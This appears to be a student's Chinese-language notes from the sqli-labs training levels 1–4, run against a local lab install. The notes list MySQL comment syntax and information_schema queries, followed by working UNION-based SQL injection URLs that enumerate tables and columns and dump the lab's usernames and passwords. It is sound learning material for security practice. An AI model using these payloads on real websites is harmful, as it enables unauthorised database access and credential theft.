学习sql注入啦,一下都是我做sqli-labs时的笔记。可能有错误,如果有人发现了欢迎指正~~
常用知识点:
1.mysql注释有三种:① #: 注释从#到行尾
② --空格: 注释到行尾,注意--后必须有空格
③/**/ :注释/* 到 */的内容
2.查询用户数据库名称
select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMA LIMIT 0,1
3.查询当前数据库表
select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=(select DATABASE()) limit 0,1
4.查询指定表的所有字段
select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='xxx' LIMIT 0,1
5.联合查询
select id, username, password from users union select 1,2,3
6.将多行结果拼成一行GROUP_CONCAT
select group_concat(user) from table limit 0, 1
用group_concat可把多个结果拼成一行。这样,如果只有一个显示位也可以显示所有信息
7.将多个字段拼成一个字段CONCAT
select concat(username, passwd) from table
Less-1: 有错误信息,单引号
基础语句:http://127.0.0.1/sqli-labs/Less-1/?id=
1.测试id类型是否为字符串,用单引号'测试
http://127.0.0.1/sqli-labs/Less-1/?id='
提示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
出现了''',说明id为字符串类型
2.测试查询时有几个字段, 用union,经测试有3段,且2,3段会展示
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3 -- a
http://127.0.0.1/sqli-labs/Less-1/?id=%27%20union%20select%201,2,3%20--%20a
3.查询数据库中的数据
①查询数据库中的所有表信息
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,GROUP_CONCAT(TABLE_NAME),3 from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(select DATABASE()) LIMIT 0,1 -- a
结果:Your Login name:emails,referers,uagents,users
说明有四张表
②查看users表中的所有字段
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1, GROUP_CONCAT(COLUMN_NAME),3 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' LIMIT 0,1 -- a
结果:Your Login name:id,username,password
③查询所有的用户名密码
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users LIMIT 0,1 -- a
结果:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
疑问:
为什么注释用-- a可以,用#就不可以?
Less-2: 错误,整数
①测试id类型
http://127.0.0.1/sqli-labs/Less-2/?id='
结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
报错了只有' LIMIT 0,1,说明id是数字型的,没有其他引号包裹
②查询所有用户名和密码,加入了order by 保证显示的是所有内容。中间步骤跟第一题相同,略过。
http://127.0.0.1/sqli-labs/Less-2/?id=3 union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a
Less-3: 错误,有干扰的字符串
①测试id类型
http://127.0.0.1/sqli-labs/Less-3/?id='
结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
与第一题的不同之处在于id后面还有个括号,可以推断其id的写法是 id = ('3') 这种格式。所以在构造sql时,除了要注意闭合引号,还要注意闭合括号。
②查询所有用户名和密码
http://127.0.0.1/sqli-labs/Less-3/?id=3') union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a
Less-4:错误,双引号
①测试id类型
http://127.0.0.1/sqli-labs/Less-4/?id='
结果正常输出,继续测试,这里偷懒了,根据名称直接试了双引号
http://127.0.0.1/sqli-labs/Less-4/?id="
结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") LIMIT 0,1' at line 1
说明id是字符串,且写法为id = ("3")
②获取所有用户名密码,闭合双引号和括号即可
http://127.0.0.1/sqli-labs/Less-4/?id=3") union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a